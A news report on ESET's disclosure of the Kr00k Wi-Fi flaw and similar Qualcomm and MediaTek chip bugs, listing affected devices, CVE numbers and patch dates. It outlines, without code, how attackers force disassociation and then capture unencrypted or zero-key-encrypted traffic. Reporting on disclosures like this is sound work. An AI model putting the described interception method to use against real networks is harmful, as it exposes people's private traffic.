In early 2020, ESET experts spoke about the Kr00k vulnerability (CVE-2019-15126), which can be used to intercept and decrypt Wi-Fi (WPA2) traffic. Then it was reported that any devices using the solutions of Cypress Semiconductor and Broadcom, from laptops and smartphones to routers and IoT devices, are susceptible to this problem.
So, the experts wrote that they tested and confirmed the problem for iPhone, iPad, Mac, Amazon Echo and Kindle, Google Nexus, Samsung Galaxy, Xiaomi Redmi, Raspberry Pi 3, as well as Wi-Fi routers from Asus and Huawei. In total, the Kr00k vulnerability was thought to threaten about a billion different gadgets.
The crux of the Kr00k problem comes down to encryption, which is used to protect data packets transmitted over Wi-Fi. Typically, such packets are encrypted with a unique key, which depends on the Wi-Fi password specified by the user. But for vulnerable chips, this key is reset to zero if the disassociation process is initiated, that is, a temporary shutdown, which usually occurs due to a bad signal.
Thus, attackers can provoke the transition of the device into a prolonged state of dissociation and receive the Wi-Fi packets intended for it. Then, by exploiting the Kr00k bug, attackers can decrypt Wi-Fi traffic using a "zero" key.
Following the release of ESET's February report, Broadcom and Cypress engineers have released fixes for their products.
However, now ESET experts warnedthat Qualcomm's and MediaTek's chips are vulnerable to similar flaws.
In the case of Qualcomm, the vulnerability received the identifier CVE-2020-3702, and using this bug, an attacker (after dissociation) can get to confidential data. The difference with the attack described above is that the data captured in this case is not encrypted at all, while the exploitation of the original Kr00k problem at least requires the use of a "zero" key.
Researchers tested this vulnerability using the D-Link DCH-G020 Smart Home Hub and the Turris Omnia wireless router as examples. However, any other devices using vulnerable Qualcomm chips are also affected by the new issue.
Qualcomm released a patch for its proprietary driver in July 2020, but the situation is complicated by the fact that some vulnerable devices use open source Linux drivers and it is unclear if the problem will be fixed there as well. Qualcomm said they have already provided OEMs with all the necessary instructions, and users can only wait for the release of patches from specific manufacturers.
In addition, ESET experts found that MediaTek chips, which are widely used in Asus routers, as well as in the Microsoft Azure Sphere development kit, also do not use encryption at all. "Azure Sphere uses the MediaTek MT3620 microcontroller and targets a wide variety of IoT applications, including smart homes, commercial, industrial and many other sectors," the researchers write.
MediaTek released fixes for this issue in March and April, and Azure Sphere received patches in July 2020.
Since a number of exploits have already been released for the original Kr00k vulnerability, the researchers published special script, which will help to find out if the above device is vulnerable to the original Kr00k or new variations of this attack.